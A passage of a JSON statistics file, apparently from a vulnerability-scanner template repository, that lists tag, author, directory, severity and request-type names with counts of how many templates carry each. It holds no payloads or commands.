a","count":1},{"name":"robomongo","count":1},{"name":"gitlist","count":1},{"name":"thinkadmin","count":1},{"name":"openemr","count":1},{"name":"gridx","count":1},{"name":"cerebro","count":1},{"name":"zcms","count":1},{"name":"grails","count":1},{"name":"phpunit","count":1},{"name":"chinaunicom","count":1},{"name":"flink","count":1},{"name":"crm","count":1},{"name":"nifi","count":1},{"name":"flash","count":1},{"name":"ambari","count":1},{"name":"duomicms","count":1},{"name":"dom","count":1},{"name":"netrc","count":1},{"name":"proftpd","count":1},{"name":"nomad","count":1},{"name":"comodo","count":1},{"name":"tenda","count":1},{"name":"zarafa","count":1},{"name":"chevereto","count":1},{"name":"spf","count":1},{"name":"clusterengine","count":1},{"name":"finereport","count":1},{"name":"bigbluebutton","count":1},{"name":"nexusdb","count":1},{"name":"glances","count":1},{"name":"pulsesecure","count":1},{"name":"springframework","count":1},{"name":"eprints","count":1},{"name":"klog","count":1},{"name":"nordex","count":1},{"name":"qdpm","count":1},{"name":"xdcms","count":1},{"name":"viewpoint","count":1},{"name":"nuxeo","count":1},{"name":"gsoap","count":1},{"name":"geutebruck","count":1},{"name":"xvr","count":1},{"name":"timeclock","count":1}],"authors":[{"name":"pikpikcu","count":267},{"name":"dhiyaneshdk","count":253},{"name":"daffainfo","count":206},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":61},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"meme-lord","count":6},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"lu4nx","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"johnk3r","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"idealphase","count":3},{"name":"shine","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"f1tz","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"fyoorer","count":3},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"mohammedsaneem","count":2},{"name":"pxmme1337","count":2},{"name":"convisoappsec","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"hahwul","count":2},{"name":"x1m_martijn","count":2},{"name":"joeldeleep","count":2},{"name":"gal nagli","count":2},{"name":"arcc","count":2},{"name":"koti2","count":2},{"name":"fabaff","count":2},{"name":"bp0lr","count":2},{"name":"sushantkamble","count":2},{"name":"amsda","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"ehsahil","count":2},{"name":"parth","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xcrypto","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"huowuzhao","count":2},{"name":"nkxxkn","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"alifathi-h1","count":2},{"name":"manas_harsh","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"kiblyn11","count":2},{"name":"cocxanh","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"remonsec","count":1},{"name":"knassar702","count":1},{"name":"cookiehanhoan","count":1},{"name":"undefl0w","count":1},{"name":"philippdelteil","count":1},{"name":"_c0wb0y_","count":1},{"name":"andysvints","count":1},{"name":"x6263","count":1},{"name":"b0yd","count":1},{"name":"ooooooo_q","count":1},{"name":"makyotox","count":1},{"name":"ahmed sherif","count":1},{"name":"ohlinge","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kre80r","count":1},{"name":"bad5ect0r","count":1},{"name":"0ut0fb4nd","count":1},{"name":"adrianmf","count":1},{"name":"sshell","count":1},{"name":"borna nematzadeh","count":1},{"name":"noamrathaus","count":1},{"name":"whynotke","count":1},{"name":"fmunozs","count":1},{"name":"geraldino2","count":1},{"name":"yashgoti","count":1},{"name":"mhdsamx","count":1},{"name":"sickwell","count":1},{"name":"mesaglio","count":1},{"name":"dawid-czarnecki","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"izn0u","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"elder tao","count":1},{"name":"shelld3v","count":1},{"name":"regala_","count":1},{"name":"pratik khalane","count":1},{"name":"shreyapohekar","count":1},{"name":"s1r1u5_","count":1},{"name":"alex","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"rotemreiss","count":1},{"name":"nytr0gen","count":1},{"name":"0xrod","count":1},{"name":"juicypotato1","count":1},{"name":"xstp","count":1},{"name":"taielab","count":1},{"name":"0xteles","count":1},{"name":"52971","count":1},{"name":"hakluke","count":1},{"name":"fopina","count":1},{"name":"rodnt","count":1},{"name":"jteles","count":1},{"name":"zandros0","count":1},{"name":"naglinagli","count":1},{"name":"0xtavian","count":1},{"name":"blckraven","count":1},{"name":"_darrenmartyn","count":1},{"name":"infosecsanyam","count":1},{"name":"me9187","count":1},{"name":"patralos","count":1},{"name":"ahmetpergamum","count":1},{"name":"vzamanillo","count":1},{"name":"th3.d1p4k","count":1},{"name":"notsoevilweasel","count":1},{"name":"un-fmunozs","count":1},{"name":"thezakman","count":1},{"name":"smaranchand","count":1},{"name":"willd96","count":1},{"name":"co0nan","count":1},{"name":"kurohost","count":1},{"name":"ilovebinbash","count":1},{"name":"aresx","count":1},{"name":"toufik airane","count":1},{"name":"j33n1k4","count":1},{"name":"bernardofsr","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"affix","count":1},{"name":"hanlaomo","count":1},{"name":"tim_koopmans","count":1},{"name":"sicksec","count":1},{"name":"udyz","count":1},{"name":"pudsec","count":1},{"name":"alperenkesk","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"akshansh","count":1},{"name":"b4uh0lz","count":1},{"name":"becivells","count":1},{"name":"ringo","count":1},{"name":"divya_mudgal","count":1},{"name":"thevillagehacker","count":1},{"name":"its0x08","count":1},{"name":"b0rn2r00t","count":1},{"name":"mubassirpatel","count":1},{"name":"defr0ggy","count":1},{"name":"push4d","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"deena","count":1},{"name":"rojanrijal","count":1},{"name":"raesene","count":1},{"name":"elmahdi","count":1},{"name":"mass0ma","count":1},{"name":"ldionmarcil","count":1},{"name":"pdp","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_harleo","count":1},{"name":"ajaysenr","count":1},{"name":"micha3lb3n","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"omarkurt","count":1},{"name":"streetofhackerr007","count":1},{"name":"c3l3si4n","count":1},{"name":"absshax","count":1},{"name":"bjhulst","count":1},{"name":"@dwisiswant0","count":1},{"name":"luskabol","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sec_hawk","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"mah3sec_","count":1},{"name":"soyelmago","count":1},{"name":"zhenwarx","count":1},{"name":"alph4byt3","count":1},{"name":"chron0x","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"0h1in9e","count":1},{"name":"intx0x80","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"yashanand155","count":1},{"name":"kareemse1im","count":1},{"name":"furkansenan","count":1},{"name":"wabafet","count":1},{"name":"ipanda","count":1},{"name":"iampritam","count":1},{"name":"petruknisme","count":1},{"name":"revblock","count":1},{"name":"gboddin","count":1},{"name":"schniggie","count":1},{"name":"apt-mirror","count":1},{"name":"sy3omda","count":1},{"name":"sullo","count":1},{"name":"andirrahmani1","count":1},{"name":"daviey","count":1},{"name":"qlkwej","count":1},{"name":"retr0","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"evolutionsec","count":1}],"directory":[{"name":"cves","count":715},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":248},{"name":"exposures","count":187},{"name":"technologies","count":182},{"name":"misconfiguration","count":132},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":630},{"name":"high","count":546},{"name":"medium","count":441},{"name":"critical","count":269},{"name":"low","count":148}],"types":[{"name":"http","count":1930},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":719},{"name":"lfi","count":258},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":222},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":126},{"name":"cve2019","count":95},{"name":"config","count":94},{"name":"cve2018","count":82},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":23},{"name":"misc","count":23},{"name":"disclosure","count":21},{"name":"auth-bypass","count":20},{"name":"generic","count":20},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2014","count":18},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"dns","count":13},{"name":"devops","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"ibm","count":7},{"name":"google","count":7},{"name":"vmware","count":7},{"name":"coldfusion","count":7},{"name":"microsoft","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"confluence","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"jolokia","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"fileupload","count":5},{"name":"git","count":4},{"name":"zabbix","count":4},{"name":"moodle","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"elastic","count":4},{"name":"exchange","count":4},{"name":"vpn","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"resin","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"buffalo","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"grafana","count":4},{"name":"crlf","count":4},{"name":"strapi","count":4},{"name":"wso2","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"hp","count":4},{"name":"symfony","count":4},{"name":"zimbra","count":4},{"name":"magmi","count":4},{"name":"camera","count":3},{"name":"r-seenet","count":3},{"name":"nosqli","count":3},{"name":"oa","count":3},{"name":"bypass","count":3},{"name":"cacti","count":3},{"name":"ebs","count":3},{"name":"druid","count":3},{"name":"openssh","count":3},{"name":"jellyfin","count":3},{"name":"opensis","count":3},{"name":"bigip","count":3},{"name":"mail","count":3},{"name":"smtp","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"backups","count":3},{"name":"log","count":3},{"name":"caucho","count":3},{"name":"bitrix","count":3},{"name":"fpd","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"slack","count":3},{"name":"tikiwiki","count":3},{"name":"telerik","count":3},{"name":"zhiyuan","count":3},{"name":"npm","count":3},{"name":"prometheus","count":3},{"name":"microstrategy","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"itop","count":3},{"name":"firebase","count":3},{"name":"jeesns","count":3},{"name":"hoteldruid","count":3},{"name":"ofbiz","count":3},{"name":"injection","count":3},{"name":"terramaster","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"openam","count":3},{"name":"emerge","count":2},{"name":"wordfence","count":2},{"name":"status","count":2},{"name":"wuzhicms","count":2},{"name":"splunk","count":2},{"name":"favicon","count":2},{"name":"liferay","count":2},{"name":"waf","count":2},{"name":"activemq","count":2},{"name":"yii","count":2},{"name":"seeyon","count":2},{"name":"spark","count":2},{"name":"hpe","count":2},{"name":"akkadian","count":2},{"name":"cve2005","count":2},{"name":"netis","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"service","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"pega","count":2},{"name":"webcam","count":2},{"name":"guacamole","count":2},{"name":"sitecore","count":2},{"name":"odoo","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"mida","count":2},{"name":"igs","count":2},{"name":"manageengine","count":2},{"name":"ilo","count":2},{"name":"huawei","count":2},{"name":"geowebserver","count":2},{"name":"trixbox","count":2},{"name":"node","count":2},{"name":"backdoor","count":2},{"name":"axis","count":2},{"name":"kentico","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"phpcollab","count":2},{"name":"globalprotect","count":2},{"name":"rockmongo","count":2},{"name":"github","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"bruteforce","count":2},{"name":"ec2","count":2},{"name":"frp","count":2},{"name":"sonarqube","count":2},{"name":"axis2","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chiyu","count":2},{"name":"hostheader-injection","count":2},{"name":"shellshock","count":2},{"name":"oauth","count":2},{"name":"mcafee","count":2},{"name":"jeedom","count":2},{"name":"saltstack","count":2},{"name":"dos","count":2},{"name":"maian","count":2},{"name":"xxljob","count":2},{"name":"ucmdb","count":2},{"name":"netsweeper","count":2},{"name":"sharepoint","count":2},{"name":"nagios","count":2},{"name":"prtg","count":2},{"name":"totemomail","count":2},{"name":"paloalto","count":2},{"name":"cve2007","count":2},{"name":"nextjs","count":2},{"name":"cache","count":2},{"name":"avantfax","count":2},{"name":"linux","count":2},{"name":"grav","count":2},{"name":"hasura","count":2},{"name":"idrac","count":2},{"name":"couchdb","count":2},{"name":"adminer","count":2},{"name":"dolibarr","count":2},{"name":"middleware","count":2},{"name":"db","count":2},{"name":"kong","count":2},{"name":"chamilo","count":2},{"name":"ecology","count":2},{"name":"azure","count":2},{"name":"minio","count":2},{"name":"rstudio","count":2},{"name":"nextcloud","count":2},{"name":"voipmonitor","count":2},{"name":"leak","count":2},{"name":"openfire","count":2},{"name":"aruba","count":2},{"name":"bucket","count":2},{"name":"jsf","count":2},{"name":"icewarp","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"natshell","count":2},{"name":"hjtcloud","count":2},{"name":"sonicwall","count":2},{"name":"storage","count":2},{"name":"selea","count":1},{"name":"trane","count":1},{"name":"announcekit","count":1},{"name":"moinmoin","count":1},{"name":"opm","count":1},{"name":"razor","count":1},{"name":"lighttpd","count":1},{"name":"enumeration","count":1},{"name":"moin","count":1},{"name":"smartsense","count":1},{"name":"st","count":1},{"name":"subrion","count":1},{"name":"arl","count":1},{"name":"fortinet","count":1},{"name":"elascticsearch","count":1},{"name":"emby","count":1},{"name":"dotnet","count":1},{"name":"huijietong","count":1},{"name":"spectracom","count":1},{"name":"webadmin","count":1},{"name":"kafdrop","count":1},{"name":"twitter-server","count":1},{"name":"plc","count":1},{"name":"kubeflow","count":1},{"name":"plastic","count":1},{"name":"redcap","count":1},{"name":"burp","count":1},{"name":"wildfly","count":1},{"name":"nedi","count":1},{"name":"rockethchat","count":1},{"name":"opencast","count":1},{"name":"webftp","count":1},{"name":"clockwork","count":1},{"name":"fortigate","count":1},{"name":"karel","count":1},{"name":"panabit","count":1},{"name":"maxsite","count":1},{"name":"expressjs","count":1},{"name":"ilo4","count":1},{"name":"tamronos","count":1},{"name":"mirai","count":1},{"name":"szhe","count":1},{"name":"wing-ftp","count":1},{"name":"bolt","count":1},{"name":"skywalking","count":1},{"name":"dvr","count":1},{"name":"cerebro","count":1},{"name":"influxdb","count":1},{"name":"openvpn","count":1},{"name":"lotus","count":1},{"name":"hiawatha","count":1},{"name":"vidyo","count":1},{"name":"oscommerce","count":1},{"name":"socomec","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"netmask","count":1},{"name":"clockwatch","count":1},{"name":"ulterius","count":1},{"name":"nc2","count":1},{"name":"sar2html","count":1},{"name":"rdp","count":1},{"name":"servicedesk","count":1},{"name":"codeigniter","count":1},{"name":"thinkadmin","count":1},{"name":"opentsdb","count":1},{"name":"pacsone","count":1},{"name":"dotnetnuke","count":1},{"name":"krweb","count":1},{"name":"timeclock","count":1},{"name":"realteo","count":1},{"name":"avalanche","count":1},{"name":"olivetti","count":1},{"name":"xdcms","count":1},{"name":"acme","count":1},{"name":"chevereto","count":1},{"name":"mpsec","count":1},{"name":"centreon","count":1},{"name":"cyberoam","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"haproxy","count":1},{"name":"domxss","count":1},{"name":"keenetic","count":1},{"name":"clink-office","count":1},{"name":"camunda","count":1},{"name":"pagespeed","count":1},{"name":"nexusdb","count":1},{"name":"mantis","count":1},{"name":"ricoh","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"zookeeper","count":1},{"name":"weiphp","count":1},{"name":"beanshell","count":1},{"name":"empirecms","count":1},{"name":"acontent","count":1},{"name":"meraki","count":1},{"name":"pgadmin","count":1},{"name":"metinfo","count":1},{"name":"optiLink","count":1},{"name":"discord","count":1},{"name":"wondercms","count":1},{"name":"idemia","count":1},{"name":"craftcms","count":1},{"name":"elfinder","count":1},{"name":"beanstalk","count":1},{"name":"webmin","count":1},{"name":"sourcebans","count":1},{"name":"landray","count":1},{"name":"varnish","count":1},{"name":"sceditor","count":1},{"name":"viewpoint","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"xff","count":1},{"name":"gogs","count":1},{"name":"gateone","count":1},{"name":"whm","count":1},{"name":"avtech","count":1},{"name":"ruckus","count":1},{"name":"proftpd","count":1},{"name":"tor","count":1},{"name":"sqlite","count":1},{"name":"lg-nas","count":1},{"name":"etouch","count":1},{"name":"ems","count":1},{"name":"fastcgi","count":1},{"name":"daybyday","count":1},{"name":"wmt","count":1},{"name":"lanproxy","count":1},{"name":"glowroot","count":1},{"name":"chyrp","count":1},{"name":"visionhub","count":1},{"name":"oidc","count":1},{"name":"aura","count":1},{"name":" default-login","count":1},{"name":"ognl","count":1},{"name":"jenzabar","count":1},{"name":"bookstack","count":1},{"name":"zms","count":1},{"name":"visualtools","count":1},{"name":"solarlog","count":1},{"name":"achecker","count":1},{"name":"duomicms","count":1},{"name":"fortilogger","count":1},{"name":"scimono","count":1},{"name":"netgenie","count":1},{"name":"zarafa","count":1},{"name":"jsp","count":1},{"name":"addpac","count":1},{"name":"sage","count":1},{"name":"jquery","count":1},{"name":"wamp","count":1},{"name":"calendarix","count":1},{"name":"solman","count":1},{"name":"luftguitar","count":1},{"name":"crm","count":1},{"name":"eyelock","count":1},{"name":"robomongo","count":1},{"name":"fortiweb","count":1},{"name":"nuuo","count":1},{"name":"bullwark","count":1},{"name":"trilithic","count":1},{"name":"wifisky","count":1},{"name":"upnp","count":1},{"name":"sprintful","count":1},{"name":"lutron","count":1},{"name":"wiki","count":1},{"name":"mrtg","count":1},{"name":"dompdf","count":1},{"name":"tapestry","count":1},{"name":"mariadb","count":1},{"name":"commscope","count":1},{"name":"majordomo2","count":1},{"name":"jitsi","count":1},{"name":"circontrorl","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"sql","count":1},{"name":"node-red-dashboard","count":1},{"name":"sidekiq","count":1},{"name":"javafaces","count":1},{"name":"panos","count":1},{"name":"glances","count":1},{"name":"graylog","count":1},{"name":"expn","count":1},{"name":"shopware","count":1},{"name":"websphere","count":1},{"name":"cors","count":1},{"name":"mailchimp","count":1},{"name":"k8","count":1},{"name":"octobercms","count":1},{"name":"rujjie","count":1},{"name":"shoppable","count":1},{"name":"bedita","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"payara","count":1},{"name":"servicenow","count":1},{"name":"ruby","count":1},{"name":"nimble","count":1},{"name":"blue-ocean","count":1},{"name":"metabase","count":1},{"name":"vnc","count":1},{"name":"upload","count":1},{"name":"rabbitmq","count":1},{"name":"redmine","count":1},{"name":"rhymix","count":1},{"name":"commax","count":1},{"name":"auth","count":1},{"name":"yachtcontrol","count":1},{"name":"h3c-imc","count":1},{"name":"cloudflare","count":1},{"name":"rsyncd","count":1},{"name":"cgi","count":1},{"name":"xvr","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"gsoap","count":1},{"name":"lancom","count":1},{"name":"jeewms","count":1},{"name":"emc","count":1},{"name":"doh","count":1},{"name":"cocoon","count":1},{"name":"grails","count":1},{"name":"sophos","count":1},{"name":"tika","count":1},{"name":"jnoj","count":1},{"name":"fiori","count":1},{"name":"xiuno","count":1},{"name":"tracer","count":1},{"name":"nette","count":1},{"name":"xmlchart","count":1},{"name":"dotclear","count":1},{"name":"turbocrm","count":1},{"name":"javascript","count":1},{"name":"artica","count":1},{"name":"saltapi","count":1},{"name":"hiboss","count":1},{"name":"gitlist","count":1},{"name":"dnssec","count":1},{"name":"oneblog","count":1},{"name":"resourcespace","count":1},{"name":"elasticsearch","count":1},{"name":"feifeicms","count":1},{"name":"kyan","count":1},{"name":"swagger","count":1},{"name":"spip","count":1},{"name":"enum","count":1},{"name":"office365","count":1},{"name":"rubedo","count":1},{"name":"faraday","count":1},{"name":"appweb","count":1},{"name":"erp-nc","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"pihole","count":1},{"name":"owasp","count":1},{"name":"fedora","count":1},{"name":"dbeaver","count":1},{"name":"webmodule-ee","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"cse","count":1},{"name":"sangfor","count":1},{"name":"rfi","count":1},{"name":"exacqvision","count":1},{"name":"netrc","count":1},{"name":"qsan","count":1},{"name":"phpfastcache","count":1},{"name":"phpunit","count":1},{"name":"minimouse","count":1},{"name":"biometrics","count":1},{"name":"pyramid","count":1},{"name":"email","count":1},{"name":"accela","count":1},{"name":"geutebruck","count":1},{"name":"powercreator","count":1},{"name":"gitea","count":1},{"name":"dom","count":1},{"name":"tidb","count":1},{"name":"vsphere","count":1},{"name":"zeroshell","count":1},{"name":"phpinfo","count":1},{"name":"kindeditor","count":1},{"name":"ntopng","count":1},{"name":"gunicorn","count":1},{"name":"gotmls","count":1},{"name":"acexy","count":1},{"name":"cherokee","count":1},{"name":"clickhouse","count":1},{"name":"gstorage","count":1},{"name":"jenkin","count":1},{"name":"flink","count":1},{"name":"sentry","count":1},{"name":"xunchi","count":1},{"name":"drone","count":1},{"name":"zte","count":1},{"name":"mobileiron","count":1},{"name":"scs","count":1},{"name":"portainer","count":1},{"name":"clave","count":1},{"name":"froxlor","count":1},{"name":"mara","count":1},{"name":"tieline","count":1},{"name":"woocomernce","count":1},{"name":"owa","count":1},{"name":"tileserver","count":1},{"name":"74cms","count":1},{"name":"anchorcms","count":1},{"name":"starttls","count":1},{"name":"opensmtpd","count":1},{"name":"extractor","count":1},{"name":"myucms","count":1},{"name":"hortonworks","count":1},{"name":"qvisdvr","count":1},{"name":"codemeter","count":1},{"name":"simplecrm","count":1},{"name":"aspnuke","count":1},{"name":"ewebs","count":1},{"name":"mongo","count":1},{"name":"openx","count":1},{"name":"linkedin","count":1},{"name":"jfrog","count":1},{"name":"iptime","count":1},{"name":"mysql","count":1},{"name":"bigbluebutton","count":1},{"name":"redhat","count":1},{"name":"fortigates","count":1},{"name":"traefik","count":1},{"name":"ghost","count":1},{"name":"blind","count":1},{"name":"bazarr","count":1},{"name":"ssl","count":1},{"name":"graphql","count":1},{"name":"azkaban","count":1},{"name":"plone","count":1},{"name":"gloo","count":1},{"name":"argussurveillance","count":1},{"name":"timesheet","count":1},{"name":"eprints","count":1},{"name":"smi","count":1},{"name":"b2evolution","count":1},{"name":"openstack","count":1},{"name":"exposures","count":1},{"name":"tcexam","count":1},{"name":"processmaker","count":1},{"name":"nordex","count":1},{"name":"klog","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"kerbynet","count":1},{"name":"gridx","count":1},{"name":"geddy","count":1},{"name":"cofax","count":1},{"name":"phalcon","count":1},{"name":"wazuh","count":1},{"name":"embedthis","count":1},{"name":"ecoa","count":1},{"name":"zmanda","count":1},{"name":"asus","count":1},{"name":"zzzcms","count":1},{"name":"monitorr","count":1},{"name":"opensns","count":1},{"name":"miscrsoft","count":1},{"name":"nifi","count":1},{"name":"k8s","count":1},{"name":"checkpoint","count":1},{"name":"centos","count":1},{"name":"listserv","count":1},{"name":"phpwiki","count":1},{"name":"alerta","count":1},{"name":"springframework","count":1},{"name":"frontpage","count":1},{"name":"expose","count":1},{"name":"omi","count":1},{"name":"rmc","count":1},{"name":"setup","count":1},{"name":"postgres","count":1},{"name":"openerp","count":1},{"name":"ssltls","count":1},{"name":"mautic","count":1},{"name":"database","count":1},{"name":"yealink","count":1},{"name":"floc","count":1},{"name":"cloudinary","count":1},{"name":"cobub","count":1},{"name":"s3","count":1},{"name":"spf","count":1},{"name":"exponentcms","count":1},{"name":"jaspersoft","count":1},{"name":"viewlinc","count":1},{"name":"tensorflow","count":1},{"name":"zenario","count":1},{"name":"werkzeug","count":1},{"name":"heroku","count":1},{"name":"esmtp","count":1},{"name":"shiro","count":1},{"name":"sgp","count":1},{"name":"cockpit","count":1},{"name":"zyxel","count":1},{"name":"goahead","count":1},{"name":"darkstat","count":1},{"name":"vsftpd","count":1},{"name":"memcached","count":1},{"name":"ioncube","count":1},{"name":"triconsole","count":1},{"name":"tenda","count":1